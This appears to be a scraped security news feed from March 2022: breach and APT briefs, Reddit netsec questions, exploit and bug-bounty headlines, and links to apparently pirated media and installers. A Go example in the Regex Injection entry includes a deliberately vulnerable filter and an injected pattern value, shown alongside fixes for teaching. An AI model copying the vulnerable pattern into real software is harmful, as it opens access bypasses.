    The Pakistan state-backed APT group known as Transparent Tribe is running a large-scale campaign with the CrimsonRAT remote access trojan, aimed squarely at Indian officials.
    FreeBuf Morning Report | Transparent Tribe attacks Indian officials; Washington health district suffers another data breach
    A health district in Washington State has published its second data breach notice of 2022.
    Shutterfly data leaked after Conti ransomware attack
    Online retail and photography platform Shutterfly recently had employee information leaked following a Conti ransomware attack. The company provides photography services to consumers, businesses and brands including Shutterfly.com, BorrowLenses, GrooveBook, Snapfish and Lifetouch. Shutterfly recently disclosed that its network was breached on 3 December 2021 as a result of the ransomware attack. During the attack, the threat actors gained access to
    Some WordPress sites injected with scripts to launch DDoS attacks against Ukraine
    The targeted sites include Ukrainian government agencies, the recruitment site of the Ukrainian International Legion, financial sites and other pro-Ukraine sites.
    Largest crypto hack ever: $625 million stolen from Axie Infinity sidechain Ronin bridge
    Attackers recently stole roughly $625 million worth of Ethereum and USDC from the Ronin bridge, the sidechain of Axie Infinity.
    Hackers send nearly 4,000 fake job-offer emails a day, promising easy money
    Proofpoint reports that a hacker group is spreading fake job offers by email, both stealing victims' personal data and luring them into money laundering.
    Vulnerability alert | Spring Framework remote command execution vulnerability warning
    On 29 March an RCE 0-day in the Spring Framework was disclosed. Deployments running JDK 9 or later may be affected.
  • Open

    [Rootkit Research Series] Prologue: The Sword of Damocles
    Author: Sangfor Qianlimu Lab (深信服千里目实验室). Preface: APT, Advanced Persistent Threat, usually has a regional or political background and aims at intelligence gathering, sabotage or economic gain. The attack chain may involve all kinds of social engineering, initial access, lateral movement inside the network and 0-day exploitation. As an asymmetric form of attack, it can deliver unexpected geopolitical, intelligence, economic or even military gains or tactical advantage to the political or economic entity behind the attacking group. Detecting, attributing and countering APT attacks often represents...
  • Open

    Windows freaking XP
    I may need to expose a Windows XP machine to the internet, although I am fighting it, a battle maybe lost. Our corp AV doesn't support XP nor will it get patched. Any suggestions on protecting it? Would a proxy server give me enough protection, specifically an NGFW acting in proxy mode with the XP machine ring-fenced to hell? It doesn't directly expose the machine to the web, but I'm not sure it will give the protection I am hoping for. The NGFW will also do IPS, deep inspection etc... Edit: thanks for the follow up all, an interesting read in the replies and some good feedback on options. I talked the management out of giving it internet access. This is an OT network with little option of changing OS as the tools/apps support only XP. OT networking is woeful at times and very real for those saying stop using XP. For those interested: isolated PVLAN behind my FW with only one "DMZ" jumpbox given inbound access to allow remote app support, with MFA and identity-based rules for access to the jumpbox, copy/paste and file transfer disabled as much as I can between the two, and only a strict select and trusted few have access to the JB. Data transfers are controlled via a manual process with a scrubbed USB stick, using a buffer device to scan before transferring data. submitted by /u/watty_123 [link] [comments]
    Questions about using public wifi
    Let's say I am at an apartment, on the plane, etc., where I am using public wifi with a VPN: Is it safe to use WhatsApp, Facebook etc.? I'm just thinking, when I use the WhatsApp or Facebook app, I don't really enter any info/PIN/password at all, so it should be safe, right? Banking apps require you to enter a PIN number. Is it safe to do this while on public wifi? Will the VPN help against this? Even if I visit websites, if those websites use HTTPS, shouldn't I be safe? submitted by /u/AliveandDrive [link] [comments]
    eJPT Cert exam
    I have been thinking of taking the eJPT cert but I want to properly learn, so does anyone know of some resources to prepare for the test or tips as well? submitted by /u/Mokushi99 [link] [comments]
    How to study SANS labs?
    Currently indexing and working through the SEC504 / GCIH labs. Aside from working through each lab multiple times, does anyone have methods to drill the labs into your brain? Not sure if indexing the 450p workbook is worth the time. Thanks in advance! submitted by /u/Vassar_Bashing [link] [comments]
    How can I make a switch from DevOps to security oriented roles?
    Hi, I started out as a developer, then I got into Cloud and automation, and I loved it very much. Cloud infrastructure automation felt like playing with Lego bricks - fitting all the right cloud services together and making someone else's job easier. I have 5 years of total experience in IT. But recently I moved into a DevOps role (if I could even call that) - and I was told that I will be working on Terraform scripts, migrating apps from on-premises, but few months into the job, I found that it is anything but that. I feel like I don't really have a core skill anymore, no identity, and feel like an imposter. My dream since the beginning was to get into security and I thought getting my hands dirty in DevOps and infrastructure related roles would help me get there, but now I do miscella…
    Higher Studies for Cyber Security
    Hi guys. A Quick thing. I am changing my career path to CyberSecurity because I always wanted to be in that but never got the chance to do so because of Financial Issues. But now I got all the stuff that I need to pursue my dream. I am 27 years old and I know I am not that late to start from scratch. So for my studies, I thought of starting from Network Engineering Diploma, HND in Network Engineering, and then BSc in Ethical Hacking and Network Security. Do you guys think this is the right path to go for or is there another path I should follow? My main target is to be in the Defense (Blue Team) side of CS. But I want to learn Pentesting as well which I though to myself doing it alone and getting help from professionals in the field. But my worry is about my studies. Please help . :) submitted by /u/PapadumSriLanka [link] [comments]
    Encrypted android->jabber (laptop) messaging?
    Basically I have a friend who isn't technically proficient, and I want him to communicate securely with me. He's too retarded to learn how to use encryption etc. After a quick setup with him, physically next to me, on his phone, what can I install on Tails to communicate? Is there a standalone Android app that will connect to Tails with him? Also, what stops Google's keyboard from storing keystrokes? submitted by /u/sohna2 [link] [comments]
    ACSC (Aus) 'Essential Eight' benchmark scanner: Do these exist for on-device scanning (like OpenSCAP can for Stig)?
    I'd love to use a tool that can mark against Essential Eight controls at different maturity levels. Everyone seems to just self-assess manually, but many can be queried with powershell modules, wmi etc. Google results are very limited for Aus-relevant security scanners. submitted by /u/L3T [link] [comments]
    Just got a life changing salary by switching job
    I cannot hold my happiness anymore and I have nobody in my entourage that I can talk to about money and career, but I just got a new high-paying job! If you check my post history, I was a bit concerned about my salary of 60k in Montreal. Now I accepted an offer of 93k (TC of 105k) for a Security Analyst role in the financial industry and, to be honest, it's a life-changing salary for me. I never imagined having this kind of salary after 2 years out of college. Still living at my parents' place and never got a high salary like this. I know this is not r/personalfinance, but what is the best advice you can give to a young professional like me? Thanks! submitted by /u/gateau_a_la_creme [link] [comments]
    First day of internship tomorrow
    Hello, so recently I graduated from MIS and I was taking some time off, doing CTFs on HTB and learning basic networks (protocols, routing, VPNs, etc.), till we recently discovered a neighbour who works in IT. I talked with him about an internship for me and he agreed after seeing my CV. His company works in cloud and IT solutions. I told him that I am more interested in the security part and he told me he can give me access to courses about Fortigate and Palo Alto, and he will let me interact with customers more. Their jobs have to do with networks a lot and I felt there is room for learning network security. At least I can change my status on LinkedIn to Network Security Intern. But they also heavily work in cloud and Azure. I am really nervous. I feel like I am going to fuck shit up tomorrow and end up being a clown. I also don't want to feel self-conscious because I didn't get it 100% from my skills but there is a connection. I am scared this internship will have nothing to do with security, but I need an internship to fill my resume. I guess tomorrow we will find out. I feel like I am going to end up smoking before meeting them and blow the whole thing up and go back to testing websites using Burp for SSRF and XSS (without any luck). submitted by /u/Ramseesthe4th [link] [comments]
  • Open

    Swappi public testnet and bug rewards
    Try Swappi and earn rewards. Up to 100,000 $PPI in rewards! Continue reading on Conflux en español »
    HTTP Header Injection
    What is HTTP Header Injection? Continue reading on CodeX »
    nothing
    Continue reading on Medium »
    How I bypassed 403 forbidden domain using a simple trick
    Hello hunters, Continue reading on Medium »
    How I Accidentally Prevented A Mass Hacking
    Not all heroes wear a cape or get paid for their work Continue reading on Geek Culture »
  • Open

    Top 5 Topics to Discuss with Clients About Website Security
    If you’re a website developer or server administrator it’s always a good idea to inform your clients about the basics in terms of their website’s security, and the inherent need for cautious security practices. Attacks and the methods of gaining access to a web server are always evolving, so it’s always in a client’s best interest to remain aware of the potential risks that come along with owning their website. Of course, these should be considered by all website owners and not limited to just the site administrators or developers, however. Continue reading Top 5 Topics to Discuss with Clients About Website Security at Sucuri Blog.
  • Open

    Go Fuzzing
    Article URL: https://go.dev/doc/fuzz/ Comments URL: https://news.ycombinator.com/item?id=30848235 Points: 1 # Comments: 0
  • Open

    Ukraine: situation report as of 30 March
    The last 24 hours Continue reading on Medium »
    War in Ukraine / March 28
    The Molfar team sends a daily newsletter about the war in Ukraine. You can subscribe to the newsletter by sending your email address to… Continue reading on Medium »
    War in Ukraine / March 27
    The Molfar team sends a daily newsletter about the war in Ukraine. You can subscribe to the newsletter by sending your email address to… Continue reading on Medium »
    War in Ukraine / March 26
    The Molfar team sends a daily newsletter about the war in Ukraine. You can subscribe to the newsletter by sending your email address to… Continue reading on Medium »
    Factchecking. Bombing of the children’s hospital and maternity hospital in Mariupol
    Our investigation revealed lots of factual errors in the claims of the Russian propaganda media. Continue reading on Medium »
    Open-Source Intelligence — the Low Down
    The whos, hows and whens of emergent information gathering systems in geopolitics and warfare. It’s not all secret these days is it when… Continue reading on The Dock on the Bay »
    My first Trace labs CTF
    Today was the day, I woke up at 0730 had my coffee and checked my email, what did I find, another confirmation email from Human Decoded… Continue reading on Medium »
  • Open

    Identify the mobile number of a twitter user
    Twitter disclosed a bug submitted by aymen_mansour: https://hackerone.com/reports/1225164 - Bounty: $560
    2 click Remote Code execution in Evernote Android
    Evernote disclosed a bug submitted by hulkvision_: https://hackerone.com/reports/1377748 - Bounty: $750
  • Open

    pync - Netcat for Python
    submitted by /u/brenw0rth [link] [comments]
    Digital Forensics Basics: A Practical Guide for Kubernetes DFIR
    submitted by /u/MiguelHzBz [link] [comments]
    Linux kernel CVE-2022-1015,CVE-2022-1016 in nf_tables cause privilege escalation
    submitted by /u/Gallus [link] [comments]
    Busyloop in curl
    submitted by /u/RegularHumanoid [link] [comments]
    Ruby Deserialization - New Gadget Chain for Ruby on Rails
    submitted by /u/Gallus [link] [comments]
  • Open

    [OC] Data Exfiltration using RedDrop - A Python Webserver for file and data exfiltration which automatically detects, decodes, decrypts, and transforms data.
    submitted by /u/cyberbutler [link] [comments]
    ABC-Code Execution for Veeam - @MDSecLabs
    submitted by /u/dmchell [link] [comments]
    Analyzing Docker Image for Retrieving Secrets
    submitted by /u/tbhaxor [link] [comments]
  • Open

    Data Exfiltration using RedDrop
    Introducing RedDrop — a quick and easy web server for capturing and processing encoded and encrypted payloads and tar archives. Continue reading on Maveris Labs »
    How to Write an Effective Pentest Report: 5 Key Sections
    As a pentester, you play a critical role in helping to secure an organization’s infrastructure, assets, and data from bad actors. While… Continue reading on Medium »
    How Clubhouse user scraping and social graphs
    TL;DR During this RedTeam testing, we used Clubhouse as a social engineering tool to find out more about our client’s employees. Continue reading on Medium »
    Reading Windows Sticky Notes
    Sticky Notes has been part of Windows since at least Windows 7. For those who aren’t familiar with it, Sticky Notes allows the user to add… Continue reading on Medium »
  • Open

    [Cullinan #30] Add ReDOS and Regex Injection
    This is Cullinan log #30. ReDoS and Regex Injection have been added. The CSP-bypass part of the XSS entry has been split out of the "Bypass protection" sub-item into its own "Bypass CSP" item, and some bypass patterns that had been missing were added along the way. A separate CSP item was also created under Defensive techniques. Add ReDoS; Add Regex Injection; Change XSS (Bypass CSP); Change XSS (Add CSP in Defensive techniques)
    Regex Injection
    🔍 Introduction Regex Injection is an injection attack in which the attacker can influence the regex pattern before it is compiled. The injection by itself rarely has a large impact, but it makes ReDoS easy to trigger. 🗡 Offensive techniques Detect With Sourcecode: if the source code is available, check whether user input can affect the regular-expression syntax. The typical case is a regex pattern that is built from an external parameter.
    Code:
    data := c.Param("user_data")
    body := c.Param("user_body")
    r, _ := regexp.
    ReDoS (Regex DoS)
    🔍 Introduction ReDoS is a security problem that can arise when a regular expression is taken from user input, or when attacker-controlled input is matched against a vulnerable pattern. Commonly called ReDoS or Regex DoS, it degrades a service's availability with a single web request by combining a self-repeating, grouped regular expression with a large input that satisfies the regex validation logic. ReDoS occurs when the regex engine uses backtracking: to explore every possible path while processing the pattern, the engine repeats inefficient work many times, exhausting system resources and achieving a DoS.
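    As an added example covering both the Regex Injection entry and the ReDoS entry above (this is not Cullinan's own code, and it does not complete the truncated snippet), the following Go program models the same shape as that snippet: a request parameter is compiled into a pattern and matched against other data. The endpoint's purpose (a prefix filter over a record list), the record set and the parameter values are all constructed for the illustration.

```go
package main

import (
	"fmt"
	"regexp"
	"strings"
)

// Constructed sample records (not from the page): "<role>:<user>:<value>".
var records = []string{
	"user:alice:token-a1",
	"user:bob:token-b2",
	"admin:root:token-r3",
}

// filterVulnerable interpolates the caller-supplied prefix straight into the
// pattern, the mistake described in the Regex Injection entry. Any metacharacter
// in prefix changes the meaning of the pattern instead of being matched literally.
func filterVulnerable(prefix string) ([]string, error) {
	re, err := regexp.Compile("^" + prefix)
	if err != nil {
		// The page's snippet discards this error with `r, _ :=`; the resulting
		// nil *Regexp panics on its first method call, a crash the caller controls.
		return nil, err
	}
	return matching(re.MatchString), nil
}

// filterSafe escapes the prefix with regexp.QuoteMeta, so every character is
// matched literally: "|" becomes a pipe character, not an alternation.
func filterSafe(prefix string) ([]string, error) {
	re, err := regexp.Compile("^" + regexp.QuoteMeta(prefix))
	if err != nil {
		return nil, err
	}
	return matching(re.MatchString), nil
}

// filterPlain does the same job with no regex at all. When the requirement is a
// literal prefix test, this is the simplest fix: there is no pattern to inject into.
func filterPlain(prefix string) []string {
	return matching(func(s string) bool { return strings.HasPrefix(s, prefix) })
}

// matching returns every record accepted by pred (never nil, so callers can
// compare lengths without a nil check).
func matching(pred func(string) bool) []string {
	out := []string{}
	for _, r := range records {
		if pred(r) {
			out = append(out, r)
		}
	}
	return out
}

func main() {
	honest := "user:alice"
	injected := "user:alice|admin" // "|" turns "^user:alice" into "^user:alice OR admin"

	v, _ := filterVulnerable(honest)
	fmt.Println("vulnerable, honest prefix:  ", v)
	v, _ = filterVulnerable(injected)
	fmt.Println("vulnerable, injected prefix:", v) // also returns the admin record

	s, _ := filterSafe(injected)
	fmt.Println("QuoteMeta, injected prefix: ", s) // nothing starts with the literal string
	fmt.Println("HasPrefix, injected prefix: ", filterPlain(injected))

	// An unbalanced pattern is a compile error; code that ignores it crashes instead.
	if _, err := filterVulnerable("("); err != nil {
		fmt.Println("compile error surfaced instead of a panic:", err)
	}
}
```

    One caveat matters for the ReDoS entry: Go's regexp package is an RE2-style engine with a linear-time guarantee in the length of the input, so the backtracking blow-up described above cannot be reproduced with it. That entry applies to backtracking engines such as PCRE, Python's re, Java's java.util.regex and the JavaScript engines. Regex injection in Go is still a logic-bypass issue, as the injected prefix shows, and a malformed pattern crashes any code that ignores the Compile error; where a pattern genuinely must come from the user, cap its length and keep a linear-time engine.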
  • Open

    Autopsy Cannot View Extracted Content In Results
    Hi. I'm new to Autopsy. I'm using the Windows version, but I have also tried using it as a part of the CAINE toolkit on a Linux VM, and I have the same problem. I am unable to view the Extracted Content drop-down, which should show interesting observations by the tool for this specific USB image file. It should also show Web Artifacts, which is absolutely crucial for this analysis. Do I need to download specific modules to view those results? Where do I get them from? I'd really appreciate any help in this regard. Thanks. https://preview.redd.it/zujbu7eticq81.png?width=620&format=png&auto=webp&s=2a6e9fd19dd7fb96bb78e373ac792d08fb52966e submitted by /u/ResourceGlum6199 [link] [comments]
    Digital Forensics Basics: A Practical Guide for Kubernetes DFIR
    submitted by /u/MiguelHzBz [link] [comments]
    Is possible to transition from LE forensics to a business role?
    Hello, Whilst aiming for an entry level business analyst job, I fell into a law enforcement digital forensic role and have remained there for 3 years as a digital forensic analyst. This is my first serious job so I don’t really have experience else where. I do have IT industry certs (none of the majors ones) but no degree. Whilst in this role, I have made a couple extremely minor operational changes (by minor, I mean barely making it to the CV/resume) which has reminded me of my drive for a business analyst type role. My salary is decent for this type of role and is more than what an entry level business analyst role would be. I would be willing to take a small pay cut but from what I’ve seen it would be around a 10k pay cut which I just cannot absorb. Besides the problem mentioned above, if at all possible, how would I transition from this role to a business role e.g. business analyst/design? Has anyone done the same? I considered writing in r/careerguidance but I cannot imagine many people in that subreddit knowing much about LE forensics. submitted by /u/gofigured21 [link] [comments]
    Telephone data collection
    Can someone let me know how I can extract data from landline phones? The data required is phone records, phone recordings etc. submitted by /u/Pepperknowsitall [link] [comments]
    How hard is it to examine iPhones?
    Is it frustrating to have to examine iPhones or any specific model of phone? I understand most smartphones use encryption and some claim that most of your data is gone after a reset, but is that really true? I don't believe any encryption is so strong it can't be bypassed. submitted by /u/Ill-Date-1852 [link] [comments]
  • Open

    SecWiki News 2022-03-29 Review
    Fvuln: an automation tool by ourren; How to build a knock-off BAB solution from open-source components by ourren; Landing software supply chain security assurance, seen through mainstream secure development frameworks by ourren. For more recent articles, visit SecWiki.
  • Open

    FreeBuf Morning Report | Fastest ransomware encrypts 53 GB of data in 4 minutes; some apps read user data from the clipboard
    A ransomware strain called LockBit is remarkably efficient: it encrypted nearly 100,000 data files, about 53 GB, on a Windows server in four minutes.
    Kimsuky attacks cryptocurrency companies and the retail sector
    Kimsuky used cryptocurrency-related material as lure documents, suggesting the attacks were aimed at cryptocurrency companies.
    Ukrtelecom services temporarily interrupted by cyberattack
    Ukrtelecom's operational services fell to 13% of pre-war levels.
    CISA urges organizations to patch Chrome and Redis vulnerabilities
    CISA has ordered federal civilian agencies to patch a Google Chrome zero-day and a serious Redis vulnerability within the next three weeks.
    GhostWriter APT uses Cobalt Strike Beacon against Ukrainian state entities
    Ukraine's CERT-UA recently identified a spear-phishing campaign by the Belarus-linked GhostWriter APT group, which attacks Ukrainian state entities with the Cobalt Strike Beacon malware. The phishing emails carried a RAR archive named "Saboteurs.rar" containing the RAR archive "Saboteurs 21.03.rar". The second archive contains the SFX archive "Saboteurs filercs.rar", which experts say
    Russia faces an internet communications crisis due to equipment shortages
    Internet service inside Russia is about to suffer large-scale disruption because of a shortage of available telecommunications equipment.
    Biden administration releases $5.8 trillion budget; cybersecurity spending increases again
    Compared with fiscal 2022, the Biden administration has again added billions to the cybersecurity budget.
    Early "triple extortion" ransomware SunCrypt found to be still active
    SunCrypt, a RaaS (ransomware as a service), was rampant in 2020. Although it went quiet afterwards, recent findings show the ransomware is still active from time to time.
    Gartner publishes "China Cloud Security Market Overview": how cloud security is entering its golden age
    Gartner expects that by 2024 nearly 40% of Chinese end-user spending on system infrastructure and infrastructure software will shift to cloud services.
  • Open

    1-13 of Spongebob Squarepants, 3 movies and Kamp Koral and Patrick Star show
    https://drive.google.com/drive/folders/12kw4rOnqnyj0vNF8SOfQZZpI9HLfzqkl submitted by /u/LateDream [link] [comments]
  • Open

    Profiling a Currently Active High-Profile Cybercriminals Portfolio of Ransomware-Themed Extortion Email Addresses - Part Five
    I've decided to continue the "Profiling a Currently Active High-Profile Cybercriminals Portfolio of Ransomware-Themed Extortion Email Addresses - Part Four" blog post series and I've decided to issue yet another update in terms of currently active ransomware themed personal email address accounts.Sample list of currently active ransomware themed email address accounts includes:restorealldata@
  • Open

    Hackers use phishing emails to distribute IcedID malware
    Translator: Knownsec 404 Lab translation team. Original: https://www.intezer.com/blog/research/conversation-hijacking-campaign-delivering-icedid/ This article is a technical analysis of a new campaign discovered by the Intezer research team: the attackers open with a phishing email and use conversation hijacking to deliver IcedID. The underground economy keeps evolving, with attackers specializing...
  • Open

    Computer Science or Cyber Security degree?
    Hey everyone, I'm in high school right now, and am 100% sure I want to work with computers, and like 80% sure I want to work in cybersec. Should I go for a cyber security degree or computer science? submitted by /u/OpBanana1 [link] [comments]
    Web app pentesting technical tutorials/checklists
    Hi! I was wondering if anyone knew any resources (website guides, books) for pentesting web apps, with specific examples of how they're done with modern (or somewhat modern) tools? I see a lot of checklists about what to test but not really how to test them or they mention how to test them at a high level. There's youtube videos and stuff but I was hoping there was a centralized resource that was more in text, but if there's a good playlist of youtube videos then that's cool too! Thanks! submitted by /u/Epsi0 [link] [comments]
    Server Internet access - block by default?
    What is the opinion these days of blocking internet access from servers that don't need it? We use local patch management and almost all of our services are internal. We've been breached (before I started) multiple times, and are using geoblocking for both inbound and outbound traffic. Just wondering if it really makes a difference. submitted by /u/brettfk [link] [comments]
    Is my pentest report ok?
    Hello, my name is Fred. I'm an ethical pentester and hacker. Top 1000 THM & HTB. I just did an NMAP and a Nessus. I don't have time to write a report - can I just give the customer my Nessus scan pentest report? submitted by /u/mrdeadbeat [link] [comments]
    Tracking vulnerabilities for non-technical staff
    What is the best way to track the remediation of vulnerabilities (not just discover them)? ​ We use tools like Nessus to discover vulnerabilities, but I'm looking to allow tracking of the process of remediation across multiple non-security teams (such as assigning tasks to sysadmins and allowing project managers to track). I'd like something more auditable than an Excel file sitting on SharePoint... We do have an internal ticketing system, but I feel like there's a better solution out there. submitted by /u/Securivangelist [link] [comments]
  • Open

    Redacted Cartel Custom Approval Logic Bugfix Review
    Summary Continue reading on Immunefi »
    Broadening our Bug Bounty Program: Trust, Security, and Transparency
    We’re expanding our public bug bounty program for Palantir’s software and infrastructure. Continue reading on Palantir Blog »
    Zenlink has partnered with Immunefi and launched a bug bounty program
    Today, 23 March 2022, we are pleased to announce that Zenlink has partnered with Immunefi and launched a bug bounty program. Continue reading on Medium »
    Zenlink has partnered with Immunefi and launched a bug bounty program
    Today, 23 March 2022, we are pleased to announce that Zenlink has partnered with Immunefi and launched a program for… Continue reading on Medium »
    Use of Default Credentials to Unauthorised Remote Access of Internal Panel of Network Video…
    👨🏼‍💻Discovered by Dnyanesh A. Gawande Continue reading on Medium »
    One-liner Bug Bounty Tips
    A collection of awesome one-liner scripts especially for bug bounty. Continue reading on Medium »
    Google Dork for instant bounties
    Google dorks that’ll get you instant bounties, proven and tested multiple times. Continue reading on Medium »
  • Open

    Ukraine: situation report as of 29 March
    The last 24 hours Continue reading on Medium »
    TryHackMe: OhSINT Room Write-Up (No Answers)
    OhSINT Room Description: “Are you able to use open source intelligence to solve this challenge?” Continue reading on Medium »
    Analysis of open-source intelligence
    Open source (in English: open source) is a technical term denoting a product that includes a licence to use its source code… Continue reading on Bureau International »
  • Open

    [Patch now!] Multiple Flaws In Azure Allow Remote Code Execution for All
    submitted by /u/GHIDRAdev [link] [comments]
  • Open

    Denial of Service vulnerability in curl when parsing MQTT server response
    curl disclosed a bug submitted by jenny: https://hackerone.com/reports/1521610
    EC2 Takeover at turn.shopify.com
    Shopify disclosed a bug submitted by 0xd0m7: https://hackerone.com/reports/1295497 - Bounty: $500
  • Open

    Climate Change 2022: Impacts, Adaptation and Vulnerability [pdf]
    Article URL: https://www.ipcc.ch/report/ar6/wg2/downloads/report/IPCC_AR6_WGII_SummaryForPolicymakers.pdf Comments URL: https://news.ycombinator.com/item?id=30834777 Points: 2 # Comments: 0
    Critical Sophos Firewall vulnerability allows remote code execution
    Article URL: https://www.bleepingcomputer.com/news/security/critical-sophos-firewall-vulnerability-allows-remote-code-execution/ Comments URL: https://news.ycombinator.com/item?id=30830479 Points: 2 # Comments: 0
  • Open

    Popcap + GameHouse games installers
    https://drive.google.com/drive/folders/1_3uk_FxyOfxJhmi79vHkseyrwhl5NaQj?fbclid=IwAR3XO8GsSlrK-ii_hgKiYPnbIUkhb5p97xraZ-lATGa9zYDn8HWdqw8lubc submitted by /u/baconpancakesboii [link] [comments]
    Large archive
    http://136.35.236.43/shared/ submitted by /u/ilikemacsalot [link] [comments]
    LLOD 03-27-22 (Large List Of Open Directories)
    http://techmedic.us/d/ http://sdfox7.com/win95/ http://sdfox7.com/netscape/ http://sdfox7.com/macppc/ https://mactorrents.io/wp-content/uploads/ http://51.15.171.201/141/ http://www.mac-torrent-download.net/wp-content/uploads/ http://www.vfxhq.com/overflow/macaddict/ http://www.newlaunches.com/entry_images/ https://download.panic.com/ http://hl.udogs.net/files/ https://mc68000.org/downloads/ https://defhoboz.biz/ http://freeware.epsc.wustl.edu/ http://www.sfu.ca/person/dearmond/322/ http://ccp14.cryst.bbk.ac.uk/ccp/ http://gentoo.mirror.beocat.ksu.edu/portage/app-arch/stuffit/ http://ftpmirror.your.org/ https://soft.uclv.edu.cu/isos/MacOS/MAC%20Leopard/Utiles/ http://baby.indstate.edu/msattler/ https://www.w3.org/History/ https://ftp.swin.edu.au/ https://www.ifarchive.org/if-archive/ http://wreckcenter.com/68k/ Extra random image: http://www.newlaunches.com/entry_images/260805/battery.bmp submitted by /u/ilikemacsalot [link] [comments]
  • Open

    CVE-2022-0995 exploit - heap out-of-bounds write in the watch_queue Linux kernel component
    submitted by /u/0xdea [link] [comments]
    CVE-2022-27666: Exploit esp6 modules in Linux kernel
    submitted by /u/0xdea [link] [comments]
    LDAP relays for initial foothold in dire situations
    submitted by /u/AlmondOffSec [link] [comments]
    New Suncrypt ransomware discovered with added capabilities
    submitted by /u/woja111 [link] [comments]
    OPNSense Firewall Bypass with Carp
    submitted by /u/oherrala [link] [comments]
    Google Issues Urgent Chrome Update to Patch Actively Exploited Zero-Day Vulnerability. CVE-2022-1096 is the second zero-day vulnerability addressed by Google in Chrome since the start of the year.
    submitted by /u/Late_Ice_9288 [link] [comments]
  • Open

    Courtesy of Republic of Bulgaria! - Part Four
    For you there's no such thing as a link you can click on? Guess what? I won't tell you. Guess what again? The word is this - a basic link which you're forbidden from clicking on. It's called "The Twilight Zone". Good luck in living there and don't forget to spend the rest of your time watching the Outer Limits. You wish!
  • Open

    SecWiki News 2022-03-28 Review
    OpenCTI Getting Started Notes (2): Storage Settings, Cleanup, and Changing the Icon and Title by ourren; CodeCat: A Powerful Static Code Analysis Tool by ourren; A Brief Analysis of the Attack/Defense Simulation Tool CyberBattleSim by ourren; How to Keep Up with So Many Security Articles (Theory) by ourren; A Compilation of HVV (护网 Network-Protection Exercise) Knowledge by ourren; A First Look at Cryptocurrency Use on the Dark Web by ourren; eCapture: Capturing HTTPS Plaintext Traffic Without a CA Certificate by ourren; Lessons from the Russia-Ukraine Cyber War by ourren; What Can We Learn from Japan's Cybersecurity Work for the Tokyo Olympics? by Avenger; SecWiki Weekly (Issue 421) by ourren. For more of the latest articles, visit SecWiki
  • Open

    FreeBuf Morning Report | Ransomware attacks in the UK surged 100% in 2021; US and EU agree to reopen transatlantic data flows
    According to a recent analysis, the number of ransomware attacks reported to the UK data protection regulator more than doubled during the pandemic period from 2020 to 2021.
    Anonymous leaks 28GB of data stolen from the Russian central bank
    Anonymous recently disclosed 28GB of stolen data through its Twitter account (@Thblckrbbtworld).
    US FCC adds Kaspersky, China Telecom and China Mobile to its national security threat list
    Kaspersky and the Chinese embassy in Washington have both responded.
    Latest Chrome zero-day vulnerability has been patched
    The Chrome browser received an emergency update that fixes a zero-day vulnerability.
    Sophos Firewall affected by a critical authentication bypass vulnerability
    Sophos recently fixed an authentication bypass vulnerability in the User Portal and Webadmin areas of Sophos Firewall, tracked as CVE-2022-1040. CVE-2022-1040 has a CVSS score of 9.8 and affects Sophos Firewall version 18.5 MR3 (18.5.3) and earlier. In a recently updated advisory, Sophos stated that this remote-code-execution-enabling authentication…
  • Open

    Browser-in-the Browser (BITB) — A New Born Phishing Methodology
    Introduction Continue reading on InfoSec Write-ups »
  • Open

    Kazakhstan's Unrest from a Cyberspace Perspective
    Author: Knownsec 404 Lab. Original download: 知道创宇404实验室网络空间视角下的哈萨克斯坦动乱.pdf. 1. Background: At the start of 2022, protests broke out in Zhanaozen, an oil town in western Kazakhstan, and quickly spread to other cities including Almaty. The protests escalated from opposition to soaring liquefied petroleum gas prices into violent riots. Some demonstrators even stormed the government of the former capital Almaty; the Almaty city government and prosecutor's office were set on fire. But as member states of the Collective Security Treaty Organization sent troops to Kazakhstan to provide assistance, Kazakh...
    Linux_Kernel Protection Mechanism Bypasses
    Author: 时钟@RainSec. Original link: https://mp.weixin.qq.com/s/gSTbXW6M72QYtVPoZswhyw. Preface: It has been a while since I worked on kernel bugs; lately I have been analyzing quite a few of them and have had many related exploit tasks, so I am studying and summarizing here for easy reference and recall. SMEP + KPTI bypass: SMEP stands for Supervisor Mode Execution Prevention; its main function is...
    Analysis and Thoughts on Go-fuzz
    Author: 时钟@RainSec. This article was contributed by the author; Seebug Paper welcomes your submissions, with a gift for every accepted one! Submission email: paper@seebug.org. go-fuzz: Much of Go-fuzz's design is based on AFL, so here I only analyze some of the aspects unique to it. I learned a lot and hope to exchange ideas with everyone; if there are errors in the analysis, please point them out. go-fuzz is a Go-language fuzzing framework open-sourced by Google; one big difference from AFL is that...
    Arkei Variants: From Vidar to Mars Stealer
    Translator: Knownsec 404 Lab translation team. Original link: https://isc.sans.edu/diary/rss/28468. Introduction: Sometime in 2018, an information stealer named Vidar appeared. Analysis showed that Vidar was a copy of the Arkei malware. Since then, Vidar has in turn inspired other Arkei-based variants. Today's article reviews Vidar and two other variants: Oski Stealer and Mars S...
  • Open

    Intigriti’s March XSS Challenge By BrunoModificato
    This month’s challenge was a bit tricky, but still fun nonetheless. The main goal is to bypass CSP protection in a way that is not… Continue reading on Medium »
  • Open

    Sans Sift vs CSI Linux
    Hi Team, I just have a quick question for you. In your opinion, what are the similarities and differences between SANS SIFT Workstation and CSI Linux? submitted by /u/bankshot15 [link] [comments]

  • Open

    SELECTING OSINT SERVICES FROM CYBER GRANDFATHER!
    https://t.me/BrainHaking2_0ENG/53 Continue reading on Medium »
    Ukraine — Situation update as of 28 March
    The last 24 hours Continue reading on Medium »
    SPY NEWS: 2022 — Week 12
    Summary of the espionage-related news stories for the Week 12 (20–26 March) of 2022. Continue reading on Medium »
  • Open

    meobrute - Automate the process of brute forcing the My Eyes Only pin code on Snapchat
    submitted by /u/rushedcar [link] [comments]
    Pulling user data from Iphone data
    Device: iPhone 5c, build 13e237. I have scraped the serial and IMEI and I have the device name; however, with a bare-bones phone without any apps having been used, is there a location to pull the owner's registered information without access to the SIM? submitted by /u/CoreRun [link] [comments]
  • Open

    Able to steal bearer token from deep link
    Basecamp disclosed a bug submitted by danielllewellyn: https://hackerone.com/reports/1372667 - Bounty: $6337
  • Open

    Have there ever been audits of Google Authenticator to confirm that Google cannot read your 2FA codes?
    Google's entire business model revolves around collecting user data, and it has a confirmed history of working with authorities to monitor individuals in the US and abroad. The Google Authenticator app is also the most popular 2FA app that exists presently. Has anyone in the NetSec community confirmed that Google does not collect 2FA information from the app and store the seed needed to generate codes on its servers? submitted by /u/JamieOvechkin [link] [comments]
    questions from WAHH?
    There are some lab URLs mentioned in the book, like http://mdsec/xyz/1837, but these are not live. My question is: has anyone solved those in the past, and how do the labs on the PortSwigger Academy compare to those? submitted by /u/Dry-Brilliant3087 [link] [comments]
